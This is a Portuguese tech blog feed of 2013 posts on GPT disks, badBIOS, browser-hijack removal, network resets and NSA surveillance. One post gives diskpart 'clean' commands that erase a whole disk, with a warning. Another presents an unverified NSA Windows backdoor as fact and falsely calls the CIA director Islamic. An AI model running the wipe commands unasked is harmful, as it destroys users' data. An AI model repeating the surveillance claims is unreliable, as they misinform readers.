<a href="http://4.bp.blogspot.com/-PhU9tVY4KAk/UQBrllG3m8I/AAAAAAAACtk/wlqv0xjpCFg/GUID_Partition_Table_Scheme_thumb%25255B1%25255D.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="color: black;"><img border="0" src="http://4.bp.blogspot.com/-PhU9tVY4KAk/UQBrllG3m8I/AAAAAAAACtk/wlqv0xjpCFg/GUID_Partition_Table_Scheme_thumb%25255B1%25255D.jpg" /></span></a></div>
<div align="justify" style="background-color: white; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
GPT (Tabela de Partição Guid) é um novo layout de particionamento de disco rígido.</div>
<div align="justify" style="background-color: white; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
Ela nasceu para substituir a MBR que limita o uso do disco rígido em até 2Tb.</div>
<div align="justify" style="background-color: white; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
Utilizando a GPT não vamos ter mais problema com unidades superiores a 2Tb, mas quem utiliza Windows da Microsoft, apenas os sistemas Vista, Windows 7 e Windows 8 podem ler ou gravar neste tipo de partição.</div>
<div align="justify" style="background-color: white; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
Junto com a GPT veio a EFI que é uma especificação que define uma interface de software entre o sistema operacional e a plataforma de firmware.</div>
<div align="justify" style="background-color: white; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
A EFI destina-se a ser um substituto significativamente melhorado para o velho BIOS <i>firmware interface</i>, historicamente usado por todos os computadores pessoais IBM PC compatíveis.</div>
<div align="justify" style="background-color: white; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
A especificação EFI foi originalmente desenvolvida pela Intel, e é atualmente gerida pelo Unified EFI Fórum que é oficialmente conhecido como Unified EFI (UEFI).</div>
<div align="justify" style="background-color: white; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
Tive um problema ao instalar o Windows7 em um Asus K45A, uma mensagem de erro era exibida:</div>
<div align="justify" style="background-color: white; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
"<b>O Windows não pode ser instalado neste disco. O disco selecionado está no estilo da partição GPT."</b></div>
<div align="justify" style="background-color: white; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
Pesquisando pela internet encontrei em um fórum uma solução que tive êxito para poder instalar o Windows no meu notebook, segui os passos abaixo:</div>
<div align="justify" style="background-color: white; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
1. Depois de dar boot via Windows7, na tela de idiomas pressione <shift> + <f10> para abrir o terminal (console)</f10></shift></div>
<blockquote style="background-color: white; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; margin: 20px;">
<div align="justify">
Digite os seguintes comandos na linha de comando:</div>
<div align="justify">
<b>diskpart</b> <enter> (Este comando permite acessar ao utilitário para gerir partições)</enter></div>
<div align="justify">
<b><i>list disk</i></b><i> <enter> (</enter></i>Mostra todos os discos. Verifica se o disco 0 corresponde ao disco que compraste (basta verificares o tamanho)</div>
<div align="justify">
<b><i>select disk 0</i></b><i> <enter> (</enter></i>Vai escolher o disco 0 para efetuar operações sobre ele. Se o disco novo não for o 0, então você deve alterar o número no comando para, por exemplo, select disk 1 )</div>
<div align="justify">
<b><i>clean</i></b><i> </i><enter> (Este comando vai eliminar as informações de configuração existentes no disco, ou seja, todos os dados e <b>TODAS as partições serão EXCLUÍDAS!</b> )</enter></div>
<i></i><div align="justify">
<i><b>create partition primary</b></i> <enter> (Este comando vai criar uma partição primária (no disco que selecionou no passo select disk x)</enter></div>
<div align="justify">
<i><b>exit</b></i><b> </b><enter> (para abandonar o utilitário diskpart )</enter></div>
<div align="justify">
<i><b>exit</b></i> <enter> (para regressar ao programa de instalação)</enter></div>
</blockquote>
<div align="justify" style="background-color: white; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<b>3</b> - Agora na tela de seleção de partição, escolhe aquela que acabou de criar. Se continuar a dar erro, reinicia o computador e verifica se o erro desapareceu (de vez em quando é necessário um reboot para que as alterações fiquem visíveis ao setup do Windows);</div>
<div align="justify" style="background-color: white; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<b>4</b> - Antes de instalar o Windows, formate o disco.</div>
<div align="justify" style="background-color: white; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<br /></div>
<div align="justify" style="background-color: white; font-family: 'PT Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
Retirado de <a href="http://www.infocotidiano.com.br/2013/01/instalando-windows-em-particoes-gpt.html" target="_blank">Info Cotidiano.</a></div>
Guilhermehttp://www.blogger.com/profile/05556516340302955329noreply@blogger.com0tag:blogger.com,1999:blog-7669976941677173274.post-2501075632240850662013-11-20T07:58:00.000-08:002013-11-20T07:58:19.503-08:00Hospede arquivos em flash (.swf) de graça e com link direto!<div class="separator" style="clear: both; text-align: center;">
<img border="0" src="http://2.bp.blogspot.com/-LDSh-1fyfrk/UozbjXQnuDI/AAAAAAAAAn0/Q00ECze0qCc/s1600/logo.png" /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Para aqueles que sentem dificuldade em encontrar um bom host para suas aplicações em flash, deixo como sugestão um site menos conhecido, porém, muito útil!<br />
<br />
<div style="text-align: center;">
<a href="http://www.shareswf.com/" target="_blank">CLIQUE AQUI PARA ACESSAR!</a></div>
Guilhermehttp://www.blogger.com/profile/05556516340302955329noreply@blogger.com0tag:blogger.com,1999:blog-7669976941677173274.post-39050418029260018912013-11-04T13:27:00.000-08:002013-11-04T13:27:24.399-08:00Novo malware pode ser o primeiro transmitido pelo arUm pesquisador de segurança diz ter encontrado um novo tipo de malware que pode afetar alguns dos níveis mais baixos da sua máquina. Este bit de código malicioso pode ser o primeiro exemplo de um vírus de computador que é transmitido pelo ar.<br />
<br />
Não, o vírus não entra por downloads Wi-Fi, mas de sinais de entrada convertidos em código pelo microfone do seu notebook. O novo malware foi apelidado de “badBIOS” por Dragos Ruiu, o pesquisador de segurança que diz ter identificado a ameaça.<br />
<br />
Ruiu disse recentemente ao Ars Technica que ele esteve rastreando o badBIOS nos últimos três anos. Desde que o vírus é declaradamente um pedaço de código, tudo o que ele tem até o momento é uma teoria de trabalho sobre como o malware funciona.<br />
<br />
O único detalhe intrigante sobre o badBIOS é que Ruiu é a única pessoa que faz tais afirmações, e ele ainda não produziu provas suficientes para que outros pesquisadores de segurança pudessem examinar de forma independente.<br />
<br />
Mas Ruiu, que organiza as conferências de segurança CanSecWest e PacWest, é respeitado o suficiente para que muitos colegas pesquisadores não hesitem em desacreditar completamente de suas reivindicações como sendo pura fantasia.<br />
<br />
Ainda assim, sem verificação independente das afirmações de Ruiu, é impossível saber com certeza se o badBIOS é real ou não.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.engenhariae.com.br/wp-content/uploads/2013/11/badbios.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://www.engenhariae.com.br/wp-content/uploads/2013/11/badbios.jpg" /></a></div>
<br />
Veja a explicação mais detalhada abaixo:<br />
<br />
Como o próprio nome sugere, o badBIOS infecta a BIOS do seu PC – o pequeno pedaço de firmware que prepara a máquina antes de iniciar o sistema operacional. Se você alguma vez já pressionou uma tecla como o F2 logo após o seu computador iniciar e, em seguida, foi para uma tela que parece que foi construída sobre um Commodore Vic 20, essa é a BIOS.<br />
<br />
Uma vez que uma máquina é infectada, o badBIOS começa a trabalhar na inserção de código malicioso dentro do próprio sistema operacional.<br />
<br />
Um malware que começa atacando pela BIOS não é algo inédito, mas a maioria dos códigos maliciosos normalmente atacam os pontos fracos em alvos padrão que vivem dentro do sistema operacional, como o Adobe Reader ou um plugin para o navegador do Java.<br />
<br />
Um vírus para a BIOS pode ser mais eficaz, já que é mais difícil de rastrear, e corrigi-lo está além da capacidade da maioria dos usuários de PC.<br />
<br />
Mas o que realmente diferencia o badBIOS dos demais é que ele supostamente é capaz de permanecer intacto se alguém reinstalar o firmware BIOS (conhecido como flashing).<br />
<br />
O badBIOS também independe de uma plataforma, o que significa que pode infectar e trabalhar em uma ampla gama de sistemas operacionais que incluem Windows, OS X, Linux e BSD, de acordo com Ruiu.<br />
<br />
O malware pode infectar uma máquina em uma de duas maneiras, de acordo com a teoria atual do pesquisador. Ele pode invadir uma máquina por meio de um USB infectado ou por meio do envio de sinais de alta frequência, captados pelo microfone de um PC infectado.<br />
<br />
Deixe-nos saber o que acha do novo tipo de Malware nos comentários.<br />
<br />
<b>FONTE :</b> engenhariae.com.brHC Hosthttp://www.blogger.com/profile/07327664629783067415noreply@blogger.com0tag:blogger.com,1999:blog-7669976941677173274.post-30738830495260152632013-10-25T20:48:00.001-07:002013-10-25T20:48:34.481-07:00Efeitos dos protestos online são mais duradouros<a href="http://1.bp.blogspot.com/-UGru6FZC024/T_7_7F79ysI/AAAAAAAACIQ/KBRCRMmvY00/s1600/733f3_anonymous_masks_616.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="212" src="http://1.bp.blogspot.com/-UGru6FZC024/T_7_7F79ysI/AAAAAAAACIQ/KBRCRMmvY00/s320/733f3_anonymous_masks_616.jpg" width="320" /></a>Protestos online podem ser mais impactantes que os físicos. Isso é o que afirma o analista de inteligência em ameaças na empresa de segurança RSA, Anchises Moraes. Segundo ele, em conversa com o site G1, os efeitos virtuais trazidos pelos chamados ciberativistas têm efeitos bem mais duradouros.<br />
<br />
"No protesto físico, quebrou, conserta e tudo bem. Mas no protesto online se expõem os dados do dono do instituto (em alusão à invasão do Instituto Royal), do dono de uma escola ou do presidente de uma organização, de uma empresa, de um político... uma vez expostos, os dados estão pra sempre na internet."<br />
<br />
Ainda de acordo com Moraes, muitas pessoas não sabem a quantidade de informações sobre si mesmas que está disponível na rede. Assim, indivíduos que muitas vezes são alvos de protestos e até mesmo terceiros ligados a essas pessoas acabam tendo dados como endereços e telefones pessoais divulgados livremente na internet.<br />
<br />
<h3>
São eventos separados?</h3>
<br />
O especialista acredita que os protestos online que vêm para acompanhar as manifestações físicas já viraram rotina e que a tendência é que eles ganhem cada vez mais força. Anchises afirma que esse é um fenômeno mundial – e que hoje em dia ambos se completam.<br />
<br />
Efeitos dos protestos online são mais duradourosAtivistas durante invasão ao Instituto Royal (Fonte da imagem: Reprodução/UOL)<br />
<br />
De acordo com ele, "quem está na rua usa as redes sociais pra divulgar o que está na rua, para fugir dos filtros da mídia, da censura, do controle da informação. Mas é comum que pessoas que não estejam participando fisicamente do protesto se aproveitem da comunicação nas redes sociais pra ajudar a divulgar, de certa forma, o protesto, porque muita gente não participa porque não quer, porque tem medo, ou porque não pode por morar em outra cidade, outro estado".<br />
<br />
No entanto, como dito acima, a atuação online não fica somente na superação das barreiras de comunicação. Há também os "hacktivistas", pessoas responsáveis pelos atos mais radicais na rede, como a divulgação de informações e a derrubada de sites. Quanto à isso, Anchises Moraes não afirma se essas ações são legais ou ilegais, citando que trata-se de uma “fronteira dúbia”.<br />
<br />
Segundo o especialista,“quando se está protestando, normalmente é contra uma situação dominante. Na perspectiva de uma parcela da população, você está fazendo a coisa certa, e, na de outra parcela, majoritária rigorosamente, você está agindo errado, porque está protestando contra o status quo".<br />
<br />
<br />HC Hosthttp://www.blogger.com/profile/07327664629783067415noreply@blogger.com0tag:blogger.com,1999:blog-7669976941677173274.post-44588104073132297282013-10-09T06:56:00.002-07:002013-10-09T06:56:54.339-07:00nLite para Windows 7, Windows 8 e Windows 8.1 em breve!<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.nliteos.com/images/nl_logo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://www.nliteos.com/images/nl_logo.png" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Você se lembra dos bons tempos do Windows XP quando era possível personalizar sua ISO de instalação usando o nLite? Ele é um dos melhores e mais populares software de personalização de instalação do Windows que permite você remover componentes indesejáveis de configuração do Windows, integrar drivers de dispositivo, hotfixes e service packs de instalação do Windows e criar uma instalação autônoma e inicializável configuração ISO do sistema operacional Windows para que você não precise digitar nada durante a instalação do Windows em computadores.</div>
<div style="text-align: justify;">
Com a ajuda do nLite, os usuários foram capazes de diminuir o tamanho do ISO de instalação do Windows, eliminando recursos desnecessários do Windows e drivers que deixou o Windows mais rápido, menos serviços estavam funcionando no fundo.</div>
<div style="text-align: justify;">
Infelizmente, o desenvolvedor parou de se desenvolver nLite e nunca foi atualizado para incluir suporte para o Windows 7 e versões posteriores do sistema operacional Windows. Entretanto alguns outro freeware, como 7Customizer e RT Sete Lite foram criados por algumas pessoas para personalizar a instalação do Windows 7 fornecendo características parecidas com as do nLite.</div>
<div style="text-align: justify;">
Agora é hora de compartilhar uma boa notícia! Nosso amigo " Nuhi ", que é o desenvolvedor do nLite e vLite, começou a trabalhar no nLite novamente. Ele compartilhou alguns detalhes que está desenvolvendo uma ferramenta que irá suportar o Windows 7 , Windows 8 e do Windows 8.1 . Esta pode ser uma nova versão do nLite ou um novo gratuito dele.</div>
<div style="text-align: justify;">
Uma vez que esta nova ferramenta é liberada, os usuários serão capazes de personalizar o Windows 7, Windows 8 ou Windows 8.1 configuração ISO para remover componentes indesejáveis, slipstream service packs, atualizações e drivers, incluir ajustes do registro, criar ISO autônoma e muito mais.</div>
<div style="text-align: justify;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-sgmpmcYkgxQ/UlVgLoQ78GI/AAAAAAAAAiE/ns5iTXd9E-I/s1600/print.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-sgmpmcYkgxQ/UlVgLoQ78GI/AAAAAAAAAiE/ns5iTXd9E-I/s1600/print.PNG" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
Postagem original.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Vamos atualizar esta página, logo que uma versão pública desta nova ferramenta é liberada, de modo a verificar este lugar regularmente.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Link para download (em breve ...)</div>
Guilhermehttp://www.blogger.com/profile/05556516340302955329noreply@blogger.com0tag:blogger.com,1999:blog-7669976941677173274.post-82308504726134113972013-10-01T14:23:00.002-07:002013-10-01T14:23:59.836-07:00Gadget de US$100 que bloqueia NSA<div class="separator" style="clear: both; text-align: center;">
<a href="http://cdni.wired.co.uk/620x413/k_n/McAfee.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="266" src="http://cdni.wired.co.uk/620x413/k_n/McAfee.jpg" width="400" /></a></div>
John McAfee, grande empresário, já se envolveu em diversos escândalos como o fato de ser suspeito de um assassinato e de ter contratado hackers para espionagem, agora ele veio com a ideia de “disponibilizar privacidade”. Vivemos em uma era que privacidade é um termo quase esquecido, mas há quem diga que pode existir.<br />
<br />
Gadget é uma geringonça que tem uma função específica, nesse caso esse gadget se comunica com notebooks, smartphones e outros aparelhos eletrônicos, cria uma rede descentralizada que não pode ser acessada por órgãos do governo e faz comunicação com ela.<br />
<br />
Ele afirma que: “Não haverá maneira [para o governo] para dizer quem você é ou onde você está.”<br />
<br />
O aparelho parece sair de um filme, mas a ideia é fácil de ser compreendida. Segundo o site <a href="http://www.theverge.com/%E2%80%8E" target="_blank">The Verge</a>, o aparelho cria pequenas redes privadas que são como uma rede inacessível pelos outros, de forma errônea podemos comparar a uma VPN para ficar mais fácil de entender. O gadget fornece uma rede dinâmica e permite que os usuários se comuniquem entre si. O dispositivo alcança 3 blocos e todos que estão dentro desses blocos podem se comunicar entre si.<br />
<br />
Foi afirmado que o projeto é antigo, mas só agora se intensificou. Um protótipo deverá sair até o próximo semestre. ”Nós temos o projeto em prática, estamos à procura de parceiros para o desenvolvimento do hardware “, explica ele.<br />
<br />
Algumas pessoas passaram a perguntar sobre seu uso ilícito e John comparou o seu gadget a uma simples telefone. “Claro que vai ser usado para fins nefastos, assim como o telefone é usado para fins nefastos.” Se o dispositivo for proibido nos EUA, a McAfee diz que ele vai simplesmente vendê-lo na Inglaterra, no Japão e outros lugares.<br />
<br />
Sabemos que o projeto é ousado, mas só podemos esperar para essa tal bugiganga entrar no mercado para conferirmos de perto, quem sabe aja esperança nesse mundo sem privacidade.HC Hosthttp://www.blogger.com/profile/07327664629783067415noreply@blogger.com0tag:blogger.com,1999:blog-7669976941677173274.post-45998137590522198782013-10-01T14:20:00.001-07:002013-10-01T14:20:19.977-07:00SÉRGIO AMADEU: VOCÊ SABE QUEM INVADE SEU COMPUTADOR?<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.baraodeitarare.org.br/images/1070054_10201113750919391_1690901228_naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://www.baraodeitarare.org.br/images/1070054_10201113750919391_1690901228_naaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.jpg" /></a></div>
<br />
Durante a "aula pública" sobre o Marco Civil da Internet, realizada nesta terça-feira (23), em São Paulo, o sociólogo Sérgio Amadeu da Silveira, especialista no tema, exibiu a apresentação "Você sabe quem invade seu computador?".<br />
<br />
Produzida com software livre e liberada para "reprodução e remixagem", como frisa o autor ao final do arquivo, a apresentação utiliza o caso de Edward Snowden, ex-analista da Agência de Segurança Nacional dos Estados Unidos e responsável por revelar ao mundo o fato de o país norte-americano espionar as atividades e comunicações de usuários da Internet em todo o globo, para discutir a questão da privacidade na Internet.<br />
<br />
O tema é um dos principais eixos do Marco Civil da Internet, projeto de lei análogo a uma espécie de Constituição da Internet no Brasil. Apesar de ser considerada por especialistas internacionais como uma das legislações mais avançadas do mundo para o setor, o projeto sofre com o lobby da indústria de telecomunicações, que se posiciona contrária à neutralidade da rede, princípio que assegura a não-discriminação dos pacotes de dados e conteúdos que circulam na rede. O princípio da neutralidade, porém, é fundamental para a garantia dos direitos à privacidade, à liberdade de expressão e à criatividade e inovatividade na rede.<br />
<br />
Confira e compartilhe a apresentação produzida por Sérgio Amadeu:<br />
<br />
<a href="http://www.baraodeitarare.org.br/images/VC%20SABE%20QUEM%20INVADE%20SEU%20COMPUTADOR.pdf" target="_blank">Você sabe quem invade seu computador?</a><br />
<br />
FONTE : baraodeitarare.org.brHC Hosthttp://www.blogger.com/profile/07327664629783067415noreply@blogger.com0tag:blogger.com,1999:blog-7669976941677173274.post-80383691750080007592013-09-30T11:44:00.002-07:002013-09-30T11:44:36.341-07:00Como se livrar da praga Página Inicial Portal dos Sites<div style="text-align: justify;">
Sim, começo com o título já logo intitulando o site de praga, pois em nenhum momento consenti com a mudança da minha página inicial em meus navegadores para este site chamado Portal dos Sites. Acredito que a mudança venha com a instalação de algum programa. Ainda não identifiquei qual, mas caso eu consigo descobrir, farei questão de postar o nome do 'problema' aqui. Normalmente a instalação de programas pede para mudar a homepage como é conhecida. Eu como conhecedor dessa encheção de saco, desativo logo a caixa quando pede para mudar a homepage. Sempre fico de olho ao instalar algum programa. Porém, este fez a mudança sem minha autorização, então é sim uma Praga (risos). Durante a tentativa de retirar esta página como homepage, mudei as configurações do Chrome e do Firefox. Em vão. Tentei desinstalar a porcaria de extensão que causava isso. NÃO É UMA EXTENSÃO. <i>Resetei</i> as configurações do navegador, e o mesmo continuava apresentando a página em questão. A solução do produtor da praga para que nenhuma destas opções funcionasse era simplesmente dar o comando para o navegador direto pelo executável. Não vou entrar em detalhes de como funciona o esquema, mas para fazer uma instrução dessas, ele precisa adicionar o comando no ATALHO do programa. (quem entende já matou a charada de como resolver o problema). Mas se você é meio leigo no assunto, sem problemas, vou explicar como resolver: </div>
<div style="text-align: justify;">
</div>
<ol>
<li>Vá até na sua área de trabalho e procure pelo ícone do seu navegador que apresenta o problema. </li>
<li>Clique com o botão direito em cima do ícone e escolha a opção<b> Propriedades</b>.</li>
<li>A seguinte imagem será apresentada:<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-SM0gAtPI4kE/UknBk7C-WEI/AAAAAAAAAhg/W7vFT5TdaIk/s1600/tuto1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-SM0gAtPI4kE/UknBk7C-WEI/AAAAAAAAAhg/W7vFT5TdaIk/s1600/tuto1.JPG" /></a></div>
<br />
</li>
<li>Clique na aba Atalho e siga até o seguinte campo:<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-bBNSJ6oyD_E/UknENRx2DYI/AAAAAAAAAhs/L4QcOmol91I/s1600/tuto2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-bBNSJ6oyD_E/UknENRx2DYI/AAAAAAAAAhs/L4QcOmol91I/s1600/tuto2.png" /></a></div>
</li>
<li>É aqui que está a instrução que comentei. Estou fazendo o tutorial com o Firefox, porém no Chrome é a mesma coisa, e acredito que em outros navegadores também. Siga até o início do 'texto' escrito dentro da caixa e você verá:<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-RtGSmCnwntU/UknE9ksiopI/AAAAAAAAAh0/tpqP8MlRNu4/s1600/tuto3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-RtGSmCnwntU/UknE9ksiopI/AAAAAAAAAh0/tpqP8MlRNu4/s1600/tuto3.PNG" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
Basta apagar o que estiver escrito após às aspas duplas ( " ) e clicar no botão OK. Caso seja no Chrome, será bem parecido, só não terá as aspas, você apagará tudo após<b> .exe</b></div>
</li>
<li>Pronto! Problema resolvido!</li>
<li><span style="color: red;">BÔNUS: </span>Para evitar que isso ocorra, você pode mudar as configurações de Segurança, na aba Segurança do atalho. Clique no usuário que você deseja proibir a modificação do atalho, clique em alterar e marque a primeira caixa na coluna Negar. Salve e pronto, caso apareça uma mensagem, clique em sim. Agora você não voltará a ter o mesmo problema.</li>
</ol>
Guilhermehttp://www.blogger.com/profile/05556516340302955329noreply@blogger.com0tag:blogger.com,1999:blog-7669976941677173274.post-3942913404997379282013-09-28T05:00:00.001-07:002013-09-28T05:00:28.140-07:00Ctrl+Alt+Delete foi um erro<br />
<a href="http://algoritmizando.com/wp-content/uploads/2011/02/ctrl-alt-del.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="240" src="http://algoritmizando.com/wp-content/uploads/2011/02/ctrl-alt-del.jpg" width="320" /></a>O fundador da Microsoft, Bill Gates, finalmente admitiu algo que os usuários do Windows pensam há muito tempo: "Ctrl+Alt+Delete" é um comando desnecessário. E, mais que isso, foi um erro.<br />
Durante uma entrevista concedida enquanto estava na Universidade de Harvard praticando sua filantropia, Gates disse que o comando de três teclas foi concebido após um designer de teclado da IBM dizer que não criaria um botão exclusivo para realizar a tarefa – que na época era habilitar a tela de logon com segurança, e não apenas acessar o Gerenciador de Tarefas quando seu PC trava.<br />
<br />
"Nós poderíamos ter tido um único botão, mas o cara que fez o design do teclado da IBM não quis nos dar um único botão", explicou Gates. Ele explicou ainda que a combinação de teclas foi projetada para impedir que outros aplicativos fingissem ser o prompt de login do sistema e roubasse a senha dos usuários.<br />
<br />
David Bradley, um engenheiro que trabalhou na IBM PC inventou a tal combinação, que originalmente foi criada para reiniciar o computador. "Eu posso ter inventado, mas Bill a tornou famosa", defendeu-se Bradley em outra entrevista. Na ocasião, ele também disse que não entendia por que Gates e a Microsoft decidiram tornar o comando um recurso de login.<br />
<br />
<b>FONTE : </b>fatosdesconhecidos.com.brHC Hosthttp://www.blogger.com/profile/07327664629783067415noreply@blogger.com0tag:blogger.com,1999:blog-7669976941677173274.post-37896550070521083942013-09-17T12:28:00.001-07:002013-09-17T12:28:27.422-07:00Internet conecta mas não navega - SOLUÇÃO!<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.revista.espiritolivre.org/wp-content/uploads/2013/02/15-02-2013_internet.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="257" src="http://www.revista.espiritolivre.org/wp-content/uploads/2013/02/15-02-2013_internet.jpg" width="320" /></a></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Se por algum motivo você não está conseguindo navegar na internet, mas a internet está conectada normalmente, tente os passos abaixo para ver se o problema é resolvido:</div>
<div style="text-align: justify;">
Abra o bloco de notes e cole nele:</div>
<br />
<b>ipconfig /release</b><br />
<b>ipconfig /renew</b><br />
<b>ipconfig /flushdns</b><br />
<b>nbtstat -rr</b><br />
<b>netsh int ip reset all</b><br />
<b>netsh winsock reset</b><br />
<b>exit</b><br />
<br />
<div style="text-align: justify;">
Salve com a extensão .bat e execute-o! Após terminar, reinicie o computador e veja se o problema foi resolvido!</div>
Guilhermehttp://www.blogger.com/profile/05556516340302955329noreply@blogger.com8tag:blogger.com,1999:blog-7669976941677173274.post-9579540841451298192013-09-11T05:21:00.000-07:002013-09-11T05:21:01.089-07:00Agência de Espionagem tem Total Acesso aos Computadores dos Usuários do Windows<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-WsowUU9RNuU/UcuUGF4y3MI/AAAAAAAAR74/2YMcC9wv5tk/Windows81_thumb%25255B3%25255D.jpg?imgmax=800" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="360" src="http://1.bp.blogspot.com/-WsowUU9RNuU/UcuUGF4y3MI/AAAAAAAAR74/2YMcC9wv5tk/Windows81_thumb%25255B3%25255D.jpg?imgmax=800" width="640" /></a></div>
<br />
<br />
A NSA, a maior organização de espionagem do mundo, tem acesso a todos os sistemas operacionais de Windows desde o lançamento do Windows 95, de acordo com grave manchete de ontem no WND, um dos maiores sites conservadores dos EUA.<br />
<br />
A porta de entrada da NSA (National Security Agency, que significa Agência de Segurança Nacional do governo dos EUA) no Windows é na verdade uma porta secreta nos fundos do sistema, um driver que permite que a NSA tenha total acesso ao sistema operacional do usuário, conforme <a href="http://www.wnd.com/2013/06/nsa-has-total-access-via-microsoft-windows/" target="_blank">denúncia em inglês do WND</a>.<br />
<br />
Anos atrás, a China foi acusada de instalar um programinha espião em computadores fabricados em instalações chinesas. Da China comunista, nada de melhor se poderia esperar. Monitoração de todos os cidadãos é comportamento padrão das ditaduras.<br />
<br />
Contudo, dos EUA, que apregoam ao mundo liberdade e democracia, espera-se mais. Eu, pelo menos, como cristão, esperava muito mais de uma nação com fortes raízes cristãs.<br />
<br />
E eu esperava mais da Microsoft, uma empresa que sempre cobrou muito caro pelo seu sistema operacional Windows. O mínimo a que o cliente tem direito pelo preço que paga é privacidade, não ser entregue de bandeja a uma organização de espionagem.<br />
<br />
Afinal, a Microsoft sempre alertava contra o Windows pirata, que poderia, de acordo com eles, tornar o computador do usuário vulnerável a vírus e invasões. Supostamente, o produto comprado ofereceria completa proteção.<br />
<br />
A Microsoft deixou os clientes na mão.<br />
<br />
Você pode ter um sistema e segurança que camufla seu IP, protegendo assim seu computador da monitoração do governo do Brasil, de Cuba, da Coreia do Norte, etc. Mas a invasão mais violenta já está garantida, num driver de fabricação da própria Microsoft.<br />
<br />
Enquanto os outros países precisam criar vírus e outros meios para invadir computadores alheios para espionar, a porta de entrada da NSA no Windows está ali instalada confortavelmente para todo e qualquer uso do Big Brother americano.<br />
<br />
Se o espiãozinho da NSA já está presente desde o Windows 95, por que então seis anos depois os sofisticados espiões americanos não conseguiram detectar os terroristas islâmicos responsáveis pelo ataque de 11 de setembro de 2001?<br />
<br />
Talvez o alvo não seja verdadeiramente os islâmicos. Prova disso é que o atual diretor da CIA é islâmico.<br />
<br />
Espero que algum hacker inteligente nos ajude a acabar com a “inteligência” dos espiõezinhos da NSA, CIA, e outras agências americanas no Windows.<br />
<br />
Enquanto isso, eu, como seguidor de Jesus Cristo, oro para que Ele me livre de toda armadilha instalada no Windows. Declaro diante de Deus como Davi, que orava:<br />
<br />
“Pois Tu tens sido o meu refúgio, uma fortaleza diante do meu inimigo.” (Salmos 61:3 KJA)<br />
<br />
Fortaleza é um lugar no alto, como uma torre de castelo, onde você ficava longe e protegido dos inimigos.<br />
<br />
Nesta era de espiões e inimigos virtuais, Deus não mudou em seu poder de proteção. As grandes agências de espionagem, até mesmo a NSA, que se vê como todo-poderosa, é menos do que uma pulga diante do Deus Todo-poderoso.<br />
<br />
Cada vez que ligarmos nosso computador, oremos: “Senhor, Te declaro meu castelo forte de proteção no meu trabalho e atividades online.”<br />
<br />
Não há nada que a NSA, a CIA, a KGB e o governo do Brasil possam fazer para furar a barreira de proteção ao redor de quem se submete à proteção do Deus Altíssimo.<br />
<br />
